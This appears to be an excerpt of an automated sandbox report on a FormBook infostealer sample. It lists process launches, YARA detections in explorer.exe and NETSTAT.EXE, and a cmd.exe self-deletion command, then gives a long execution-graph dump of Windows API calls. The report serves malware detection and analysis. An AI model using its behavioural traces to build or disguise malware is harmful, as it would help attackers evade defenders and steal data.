                                Commandline:C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe C:\Users\user\AppData\Local\Temp\sxlvpqj
                                Imagebase:0x9c0000
                                File size:4096 bytes
                                MD5 hash:4745AFD382988B0E54FCA3B7C6CC62C6
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.256509759.0000000002730000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.256509759.0000000002730000.00000004.00001000.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.256509759.0000000002730000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                Reputation:low

                                Target ID:4
                                Start time:06:11:13
                                Start date:02/04/2022
                                Path:C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe C:\Users\user\AppData\Local\Temp\sxlvpqj
                                Imagebase:0x9c0000
                                File size:4096 bytes
                                MD5 hash:4745AFD382988B0E54FCA3B7C6CC62C6
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.253680053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.253680053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.253680053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.335402219.0000000000CC0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.335402219.0000000000CC0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.335402219.0000000000CC0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.335144236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.335144236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.335144236.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.252192070.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.252192070.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.252192070.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.335351596.0000000000C80000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.335351596.0000000000C80000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.335351596.0000000000C80000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                Reputation:low

                                Target ID:6
                                Start time:06:11:17
                                Start date:02/04/2022
                                Path:C:\Windows\explorer.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\Explorer.EXE
                                Imagebase:0x7ff6b8cf0000
                                File size:3933184 bytes
                                MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.284289217.000000000711A000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.284289217.000000000711A000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.284289217.000000000711A000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.298993321.000000000711A000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.298993321.000000000711A000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.298993321.000000000711A000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                Reputation:high

                                Target ID:15
                                Start time:06:11:50
                                Start date:02/04/2022
                                Path:C:\Windows\SysWOW64\NETSTAT.EXE
                                Wow64 process (32bit):true
                                Commandline:C:\Windows\SysWOW64\NETSTAT.EXE
                                Imagebase:0xa80000
                                File size:32768 bytes
                                MD5 hash:4E20FF629119A809BC0E7EE2D18A7FDB
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.512171095.0000000000880000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.512171095.0000000000880000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.512171095.0000000000880000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.512366000.00000000008D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.512366000.00000000008D0000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.512366000.00000000008D0000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.511628756.0000000000420000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.511628756.0000000000420000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.511628756.0000000000420000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                Reputation:moderate

                                Target ID:18
                                Start time:06:11:54
                                Start date:02/04/2022
                                Path:C:\Windows\SysWOW64\cmd.exe
                                Wow64 process (32bit):true
                                Commandline:/c del "C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe"
                                Imagebase:0xc20000
                                File size:232960 bytes
                                MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high

                                Target ID:19
                                Start time:06:11:55
                                Start date:02/04/2022
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff7c9170000
                                File size:625664 bytes
                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high

                                  Execution Graph

                                  Execution Coverage:15.4%
                                  Dynamic/Decrypted Code Coverage:0%
                                  Signature Coverage:16.8%
                                  Total number of Nodes:1372
                                  Total number of Limit Nodes:20
3461->3472 3463->3440 3465 404088 3464->3465 3466 40409d 3464->3466 3469 40140b 2 API calls 3465->3469 3470 40140b 2 API calls 3466->3470 3467 40409b 3467->3440 3468->3453 3468->3454 3468->3460 3471 404463 18 API calls 3468->3471 3474 404463 18 API calls 3468->3474 3469->3472 3473 4040a4 3470->3473 3471->3468 3511 40443c 3472->3511 3473->3440 3473->3472 3475 404215 GetDlgItem 3474->3475 3476 404232 ShowWindow EnableWindow 3475->3476 3477 40422a 3475->3477 3532 404485 EnableWindow 3476->3532 3477->3476 3479 40425c EnableWindow 3484 404270 3479->3484 3480 404275 GetSystemMenu EnableMenuItem SendMessageW 3481 4042a5 SendMessageW 3480->3481 3480->3484 3481->3484 3484->3480 3533 404498 SendMessageW 3484->3533 3534 403f45 3484->3534 3537 406507 lstrcpynW 3484->3537 3486 4042d4 lstrlenW 3487 406544 17 API calls 3486->3487 3488 4042ea SetWindowTextW 3487->3488 3489 401389 2 API calls 3488->3489 3490 4042fb 3489->3490 3490->3446 3490->3468 3491 40432e DestroyWindow 3490->3491 3493 404329 3490->3493 3491->3448 3492 404348 CreateDialogParamW 3491->3492 3492->3448 3494 40437b 3492->3494 3493->3446 3495 404463 18 API calls 3494->3495 3496 404386 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3495->3496 3497 401389 2 API calls 3496->3497 3498 4043cc 3497->3498 3498->3446 3499 4043d4 ShowWindow 3498->3499 3500 4044af SendMessageW 3499->3500 3501 4043ec 3500->3501 3501->3448 3503 406544 17 API calls 3502->3503 3504 40446e SetDlgItemTextW 3503->3504 3504->3436 3506 401389 2 API calls 3505->3506 3507 401420 3506->3507 3507->3429 3509 4044c7 3508->3509 3510 4044b8 SendMessageW 3508->3510 3509->3468 3510->3509 3512 404443 3511->3512 3513 404449 SendMessageW 3511->3513 3512->3513 3513->3467 3515 4044e2 GetWindowLongW 3514->3515 3516 40458d 3514->3516 3515->3516 3517 4044f7 3515->3517 3516->3446 3517->3516 3518 404524 GetSysColor 3517->3518 3519 404527 3517->3519 3518->3519 3520 404537 SetBkMode 3519->3520 3521 40452d SetTextColor 3519->3521 3522 404555 3520->3522 3523 40454f 
GetSysColor 3520->3523 3521->3520 3524 404566 3522->3524 3525 40455c SetBkColor 3522->3525 3523->3522 3524->3516 3526 404580 CreateBrushIndirect 3524->3526 3527 404579 DeleteObject 3524->3527 3525->3524 3526->3516 3527->3526 3530 401390 3528->3530 3529 4013fe 3529->3433 3529->3456 3530->3529 3531 4013cb MulDiv SendMessageW 3530->3531 3531->3530 3532->3479 3533->3484 3535 406544 17 API calls 3534->3535 3536 403f53 SetWindowTextW 3535->3536 3536->3484 3537->3486 4238 401968 4239 402d84 17 API calls 4238->4239 4240 40196f 4239->4240 4241 402d84 17 API calls 4240->4241 4242 40197c 4241->4242 4243 402da6 17 API calls 4242->4243 4244 401993 lstrlenW 4243->4244 4245 4019a4 4244->4245 4246 4019e5 4245->4246 4250 406507 lstrcpynW 4245->4250 4248 4019d5 4248->4246 4249 4019da lstrlenW 4248->4249 4249->4246 4250->4248 4251 40166a 4252 402da6 17 API calls 4251->4252 4253 401670 4252->4253 4254 40683d 2 API calls 4253->4254 4255 401676 4254->4255 4256 402aeb 4257 402d84 17 API calls 4256->4257 4258 402af1 4257->4258 4259 40292e 4258->4259 4260 406544 17 API calls 4258->4260 4260->4259 4261 4026ec 4262 402d84 17 API calls 4261->4262 4269 4026fb 4262->4269 4263 402838 4264 402745 ReadFile 4264->4263 4264->4269 4265 40607a ReadFile 4265->4269 4267 402785 MultiByteToWideChar 4267->4269 4268 40283a 4283 40644e wsprintfW 4268->4283 4269->4263 4269->4264 4269->4265 4269->4267 4269->4268 4271 4027ab SetFilePointer MultiByteToWideChar 4269->4271 4273 40284b 4269->4273 4274 4060d8 SetFilePointer 4269->4274 4271->4269 4272 40286c SetFilePointer 4272->4263 4273->4263 4273->4272 4275 4060f4 4274->4275 4278 40610c 4274->4278 4276 40607a ReadFile 4275->4276 4277 406100 4276->4277 4277->4278 4279 406115 SetFilePointer 4277->4279 4280 40613d SetFilePointer 4277->4280 4278->4269 4279->4280 4281 406120 4279->4281 4280->4278 4282 4060a9 WriteFile 4281->4282 4282->4278 4283->4263 3848 40176f 3849 402da6 17 API calls 3848->3849 3850 401776 3849->3850 3851 401796 3850->3851 3852 40179e 3850->3852 
3887 406507 lstrcpynW 3851->3887 3888 406507 lstrcpynW 3852->3888 3855 40179c 3859 40678e 5 API calls 3855->3859 3856 4017a9 3857 405dd6 3 API calls 3856->3857 3858 4017af lstrcatW 3857->3858 3858->3855 3863 4017bb 3859->3863 3860 40683d 2 API calls 3860->3863 3861 405fd2 2 API calls 3861->3863 3863->3860 3863->3861 3864 4017cd CompareFileTime 3863->3864 3865 40188d 3863->3865 3871 406507 lstrcpynW 3863->3871 3874 406544 17 API calls 3863->3874 3880 405b67 MessageBoxIndirectW 3863->3880 3883 401864 3863->3883 3886 405ff7 GetFileAttributesW CreateFileW 3863->3886 3864->3863 3866 405569 24 API calls 3865->3866 3868 401897 3866->3868 3867 405569 24 API calls 3885 401879 3867->3885 3869 4032b4 35 API calls 3868->3869 3870 4018aa 3869->3870 3872 4018be SetFileTime 3870->3872 3873 4018d0 FindCloseChangeNotification 3870->3873 3871->3863 3872->3873 3875 4018e1 3873->3875 3873->3885 3874->3863 3876 4018e6 3875->3876 3877 4018f9 3875->3877 3878 406544 17 API calls 3876->3878 3879 406544 17 API calls 3877->3879 3881 4018ee lstrcatW 3878->3881 3882 401901 3879->3882 3880->3863 3881->3882 3884 405b67 MessageBoxIndirectW 3882->3884 3883->3867 3883->3885 3884->3885 3886->3863 3887->3855 3888->3856 4291 401a72 4292 402d84 17 API calls 4291->4292 4293 401a7b 4292->4293 4294 402d84 17 API calls 4293->4294 4295 401a20 4294->4295 4296 401573 4297 401583 ShowWindow 4296->4297 4298 40158c 4296->4298 4297->4298 4299 40159a ShowWindow 4298->4299 4300 402c2a 4298->4300 4299->4300 4301 403b74 4302 403b7f 4301->4302 4303 403b86 GlobalAlloc 4302->4303 4304 403b83 4302->4304 4303->4304 4305 4023f4 4306 402da6 17 API calls 4305->4306 4307 402403 4306->4307 4308 402da6 17 API calls 4307->4308 4309 40240c 4308->4309 4310 402da6 17 API calls 4309->4310 4311 402416 GetPrivateProfileStringW 4310->4311 4312 4014f5 SetForegroundWindow 4313 402c2a 4312->4313 4314 401ff6 4315 402da6 17 API calls 4314->4315 4316 401ffd 4315->4316 4317 40683d 2 API calls 4316->4317 4318 402003 4317->4318 4320 402014 
4318->4320 4321 40644e wsprintfW 4318->4321 4321->4320 3566 4034f7 SetErrorMode GetVersionExW 3567 403581 3566->3567 3568 403549 GetVersionExW 3566->3568 3569 4035da 3567->3569 3570 4068d4 5 API calls 3567->3570 3568->3567 3571 406864 3 API calls 3569->3571 3570->3569 3572 4035f0 lstrlenA 3571->3572 3572->3569 3573 403600 3572->3573 3574 4068d4 5 API calls 3573->3574 3575 403607 3574->3575 3576 4068d4 5 API calls 3575->3576 3577 40360e 3576->3577 3578 4068d4 5 API calls 3577->3578 3579 40361a #17 OleInitialize SHGetFileInfoW 3578->3579 3656 406507 lstrcpynW 3579->3656 3582 403667 GetCommandLineW 3657 406507 lstrcpynW 3582->3657 3584 403679 3585 405e03 CharNextW 3584->3585 3586 40369f CharNextW 3585->3586 3591 4036b0 3586->3591 3587 4037ae 3588 4037c2 GetTempPathW 3587->3588 3658 4034c6 3588->3658 3590 4037da 3592 403834 DeleteFileW 3590->3592 3593 4037de GetWindowsDirectoryW lstrcatW 3590->3593 3591->3587 3594 405e03 CharNextW 3591->3594 3601 4037b0 3591->3601 3668 40307d GetTickCount GetModuleFileNameW 3592->3668 3595 4034c6 12 API calls 3593->3595 3594->3591 3597 4037fa 3595->3597 3597->3592 3600 4037fe GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3597->3600 3598 403847 3599 403a23 ExitProcess OleUninitialize 3598->3599 3606 405e03 CharNextW 3598->3606 3640 4038fc 3598->3640 3603 403a33 3599->3603 3604 403a48 3599->3604 3605 4034c6 12 API calls 3600->3605 3752 406507 lstrcpynW 3601->3752 3757 405b67 3603->3757 3609 403a50 GetCurrentProcess OpenProcessToken 3604->3609 3610 403ac6 ExitProcess 3604->3610 3611 40382c 3605->3611 3622 403869 3606->3622 3615 403a96 3609->3615 3616 403a67 LookupPrivilegeValueW AdjustTokenPrivileges 3609->3616 3611->3592 3611->3599 3612 40390b 3612->3599 3617 4068d4 5 API calls 3615->3617 3616->3615 3620 403a9d 3617->3620 3618 4038d2 3624 405ede 18 API calls 3618->3624 3619 403913 3623 405ad2 5 API calls 3619->3623 3621 403ab2 ExitWindowsEx 3620->3621 3625 403abf 3620->3625 3621->3610 3621->3625 3622->3618 
3622->3619 3626 403918 lstrcatW 3623->3626 3627 4038de 3624->3627 3628 40140b 2 API calls 3625->3628 3629 403934 lstrcatW lstrcmpiW 3626->3629 3630 403929 lstrcatW 3626->3630 3627->3599 3753 406507 lstrcpynW 3627->3753 3628->3610 3629->3612 3631 403954 3629->3631 3630->3629 3633 403960 3631->3633 3634 403959 3631->3634 3638 405ab5 2 API calls 3633->3638 3637 405a38 4 API calls 3634->3637 3635 4038f1 3754 406507 lstrcpynW 3635->3754 3641 40395e 3637->3641 3639 403965 SetCurrentDirectoryW 3638->3639 3642 403982 3639->3642 3643 403977 3639->3643 3696 403bb6 3640->3696 3641->3639 3756 406507 lstrcpynW 3642->3756 3755 406507 lstrcpynW 3643->3755 3646 406544 17 API calls 3647 4039c4 DeleteFileW 3646->3647 3648 4039d0 CopyFileW 3647->3648 3653 40398f 3647->3653 3648->3653 3649 403a1a 3650 4062c7 36 API calls 3649->3650 3650->3612 3651 4062c7 36 API calls 3651->3653 3652 406544 17 API calls 3652->3653 3653->3646 3653->3649 3653->3651 3653->3652 3654 405aea 2 API calls 3653->3654 3655 403a04 CloseHandle 3653->3655 3654->3653 3655->3653 3656->3582 3657->3584 3659 40678e 5 API calls 3658->3659 3660 4034d2 3659->3660 3661 4034dc 3660->3661 3662 405dd6 3 API calls 3660->3662 3661->3590 3663 4034e4 3662->3663 3664 405ab5 2 API calls 3663->3664 3665 4034ea 3664->3665 3761 406026 3665->3761 3765 405ff7 GetFileAttributesW CreateFileW 3668->3765 3670 4030bd 3671 4030cd 3670->3671 3766 406507 lstrcpynW 3670->3766 3671->3598 3673 4030e3 3674 405e22 2 API calls 3673->3674 3675 4030e9 3674->3675 3767 406507 lstrcpynW 3675->3767 3677 4030f4 GetFileSize 3692 4031ee 3677->3692 3695 40310b 3677->3695 3679 4031f7 3679->3671 3681 403227 GlobalAlloc 3679->3681 3804 4034af SetFilePointer 3679->3804 3779 4034af SetFilePointer 3681->3779 3683 40325a 3685 403019 6 API calls 3683->3685 3685->3671 3686 403210 3688 403499 ReadFile 3686->3688 3687 403242 3780 4032b4 3687->3780 3690 40321b 3688->3690 3690->3671 3690->3681 3691 403019 6 API calls 3691->3695 3768 403019 3692->3768 3693 40324e 3693->3671 
3693->3693 3694 40328b SetFilePointer 3693->3694 3694->3671 3695->3671 3695->3683 3695->3691 3695->3692 3801 403499 3695->3801 3697 4068d4 5 API calls 3696->3697 3698 403bca 3697->3698 3699 403bd0 GetUserDefaultUILanguage 3698->3699 3700 403be2 3698->3700 3813 40644e wsprintfW 3699->3813 3702 4063d5 3 API calls 3700->3702 3704 403c12 3702->3704 3703 403be0 3814 403e8c 3703->3814 3705 403c31 lstrcatW 3704->3705 3707 4063d5 3 API calls 3704->3707 3705->3703 3707->3705 3709 405ede 18 API calls 3710 403c63 3709->3710 3711 403cf7 3710->3711 3713 4063d5 3 API calls 3710->3713 3712 405ede 18 API calls 3711->3712 3714 403cfd 3712->3714 3715 403c95 3713->3715 3716 403d0d LoadImageW 3714->3716 3717 406544 17 API calls 3714->3717 3715->3711 3721 403cb6 lstrlenW 3715->3721 3725 405e03 CharNextW 3715->3725 3718 403db3 3716->3718 3719 403d34 RegisterClassW 3716->3719 3717->3716 3720 40140b 2 API calls 3718->3720 3722 403dbd 3719->3722 3723 403d6a SystemParametersInfoW CreateWindowExW 3719->3723 3724 403db9 3720->3724 3726 403cc4 lstrcmpiW 3721->3726 3727 403cea 3721->3727 3722->3612 3723->3718 3724->3722 3732 403e8c 18 API calls 3724->3732 3729 403cb3 3725->3729 3726->3727 3730 403cd4 GetFileAttributesW 3726->3730 3728 405dd6 3 API calls 3727->3728 3733 403cf0 3728->3733 3729->3721 3731 403ce0 3730->3731 3731->3727 3734 405e22 2 API calls 3731->3734 3735 403dca 3732->3735 3822 406507 lstrcpynW 3733->3822 3734->3727 3737 403dd6 ShowWindow 3735->3737 3738 403e59 3735->3738 3740 406864 3 API calls 3737->3740 3823 40563c OleInitialize 3738->3823 3742 403dee 3740->3742 3741 403e5f 3743 403e7b 3741->3743 3745 403e63 3741->3745 3744 403dfc GetClassInfoW 3742->3744 3747 406864 3 API calls 3742->3747 3746 40140b 2 API calls 3743->3746 3748 403e10 GetClassInfoW RegisterClassW 3744->3748 3749 403e26 DialogBoxParamW 3744->3749 3745->3722 3750 40140b 2 API calls 3745->3750 3746->3722 3747->3744 3748->3749 3751 40140b 2 API calls 3749->3751 3750->3722 3751->3722 3752->3588 3753->3635 
3754->3640 3755->3642 3756->3653 3758 405b7c 3757->3758 3759 403a40 ExitProcess 3758->3759 3760 405b90 MessageBoxIndirectW 3758->3760 3760->3759 3762 406033 GetTickCount GetTempFileNameW 3761->3762 3763 4034f5 3762->3763 3764 406069 3762->3764 3763->3590 3764->3762 3764->3763 3765->3670 3766->3673 3767->3677 3769 403022 3768->3769 3770 40303a 3768->3770 3771 403032 3769->3771 3772 40302b DestroyWindow 3769->3772 3773 403042 3770->3773 3774 40304a GetTickCount 3770->3774 3771->3679 3772->3771 3775 406910 2 API calls 3773->3775 3776 403058 CreateDialogParamW ShowWindow 3774->3776 3777 40307b 3774->3777 3778 403048 3775->3778 3776->3777 3777->3679 3778->3679 3779->3687 3781 4032cd 3780->3781 3782 4032f8 3781->3782 3812 4034af SetFilePointer 3781->3812 3784 403499 ReadFile 3782->3784 3785 403303 3784->3785 3786 403315 GetTickCount 3785->3786 3787 403439 3785->3787 3789 403423 3785->3789 3797 403328 3786->3797 3788 40343d 3787->3788 3793 403455 3787->3793 3790 403499 ReadFile 3788->3790 3789->3693 3790->3789 3791 403499 ReadFile 3791->3793 3792 403499 ReadFile 3792->3797 3793->3789 3793->3791 3794 4060a9 WriteFile 3793->3794 3794->3793 3796 40338e GetTickCount 3796->3797 3797->3789 3797->3792 3797->3796 3798 4033b7 MulDiv wsprintfW 3797->3798 3800 4060a9 WriteFile 3797->3800 3805 406a4f 3797->3805 3799 405569 24 API calls 3798->3799 3799->3797 3800->3797 3802 40607a ReadFile 3801->3802 3803 4034ac 3802->3803 3803->3695 3804->3686 3806 406a74 3805->3806 3809 406a7c 3805->3809 3806->3797 3807 406b03 GlobalFree 3808 406b0c GlobalAlloc 3807->3808 3808->3806 3808->3809 3809->3806 3809->3807 3809->3808 3810 406b83 GlobalAlloc 3809->3810 3811 406b7a GlobalFree 3809->3811 3810->3806 3810->3809 3811->3810 3812->3782 3813->3703 3815 403ea0 3814->3815 3830 40644e wsprintfW 3815->3830 3817 403f11 3818 403f45 18 API calls 3817->3818 3820 403f16 3818->3820 3819 403c41 3819->3709 3820->3819 3821 406544 17 API calls 3820->3821 3821->3820 3822->3711 3824 4044af SendMessageW 3823->3824 
3825 40565f 3824->3825 3828 401389 2 API calls 3825->3828 3829 405686 3825->3829 3826 4044af SendMessageW 3827 405698 OleUninitialize 3826->3827 3827->3741 3828->3825 3829->3826 3830->3817 4322 401b77 4323 402da6 17 API calls 4322->4323 4324 401b7e 4323->4324 4325 402d84 17 API calls 4324->4325 4326 401b87 wsprintfW 4325->4326 4327 402c2a 4326->4327 4328 40167b 4329 402da6 17 API calls 4328->4329 4330 401682 4329->4330 4331 402da6 17 API calls 4330->4331 4332 40168b 4331->4332 4333 402da6 17 API calls 4332->4333 4334 401694 MoveFileW 4333->4334 4335 4016a7 4334->4335 4341 4016a0 4334->4341 4336 4022f6 4335->4336 4337 40683d 2 API calls 4335->4337 4339 4016b6 4337->4339 4338 401423 24 API calls 4338->4336 4339->4336 4340 4062c7 36 API calls 4339->4340 4340->4341 4341->4338 4342 406bfe 4343 406a82 4342->4343 4344 4073ed 4343->4344 4345 406b03 GlobalFree 4343->4345 4346 406b0c GlobalAlloc 4343->4346 4347 406b83 GlobalAlloc 4343->4347 4348 406b7a GlobalFree 4343->4348 4345->4346 4346->4343 4346->4344 4347->4343 4347->4344 4348->4347 4349 4019ff 4350 402da6 17 API calls 4349->4350 4351 401a06 4350->4351 4352 402da6 17 API calls 4351->4352 4353 401a0f 4352->4353 4354 401a16 lstrcmpiW 4353->4354 4355 401a28 lstrcmpW 4353->4355 4356 401a1c 4354->4356 4355->4356 4357 4022ff 4358 402da6 17 API calls 4357->4358 4359 402305 4358->4359 4360 402da6 17 API calls 4359->4360 4361 40230e 4360->4361 4362 402da6 17 API calls 4361->4362 4363 402317 4362->4363 4364 40683d 2 API calls 4363->4364 4365 402320 4364->4365 4366 402331 lstrlenW lstrlenW 4365->4366 4370 402324 4365->4370 4368 405569 24 API calls 4366->4368 4367 405569 24 API calls 4371 40232c 4367->4371 4369 40236f SHFileOperationW 4368->4369 4369->4370 4369->4371 4370->4367 4370->4371 4372 401000 4373 401037 BeginPaint GetClientRect 4372->4373 4374 40100c DefWindowProcW 4372->4374 4376 4010f3 4373->4376 4377 401179 4374->4377 4378 401073 CreateBrushIndirect FillRect DeleteObject 4376->4378 4379 4010fc 4376->4379 4378->4376 
4380 401102 CreateFontIndirectW 4379->4380 4381 401167 EndPaint 4379->4381 4380->4381 4382 401112 6 API calls 4380->4382 4381->4377 4382->4381 4383 401d81 4384 401d94 GetDlgItem 4383->4384 4385 401d87 4383->4385 4386 401d8e 4384->4386 4387 402d84 17 API calls 4385->4387 4388 401dd5 GetClientRect LoadImageW SendMessageW 4386->4388 4389 402da6 17 API calls 4386->4389 4387->4386 4391 401e33 4388->4391 4393 401e3f 4388->4393 4389->4388 4392 401e38 DeleteObject 4391->4392 4391->4393 4392->4393 4394 401503 4395 40150b 4394->4395 4397 40151e 4394->4397 4396 402d84 17 API calls 4395->4396 4396->4397 4398 402383 4399 40238a 4398->4399 4403 40239d 4398->4403 4400 406544 17 API calls 4399->4400 4401 402397 4400->4401 4402 405b67 MessageBoxIndirectW 4401->4402 4402->4403 4404 402c05 SendMessageW 4405 402c2a 4404->4405 4406 402c1f InvalidateRect 4404->4406 4406->4405 4414 40248a 4415 402da6 17 API calls 4414->4415 4416 40249c 4415->4416 4417 402da6 17 API calls 4416->4417 4418 4024a6 4417->4418 4431 402e36 4418->4431 4421 4024de 4424 4024ea 4421->4424 4426 402d84 17 API calls 4421->4426 4422 40292e 4423 402da6 17 API calls 4425 4024d4 lstrlenW 4423->4425 4427 402509 RegSetValueExW 4424->4427 4428 4032b4 35 API calls 4424->4428 4425->4421 4426->4424 4429 40251f RegCloseKey 4427->4429 4428->4427 4429->4422 4432 402e51 4431->4432 4435 4063a2 4432->4435 4436 4063b1 4435->4436 4437 4024b6 4436->4437 4438 4063bc RegCreateKeyExW 4436->4438 4437->4421 4437->4422 4437->4423 4438->4437 4439 40290b 4440 402da6 17 API calls 4439->4440 4441 402912 FindFirstFileW 4440->4441 4442 40293a 4441->4442 4445 402925 4441->4445 4447 40644e wsprintfW 4442->4447 4444 402943 4448 406507 lstrcpynW 4444->4448 4447->4444 4448->4445 4449 40190c 4450 401943 4449->4450 4451 402da6 17 API calls 4450->4451 4452 401948 4451->4452 4453 405c13 67 API calls 4452->4453 4454 401951 4453->4454 4455 40490d 4456 404943 4455->4456 4457 40491d 4455->4457 4459 4044ca 8 API calls 4456->4459 4458 404463 18 API calls 
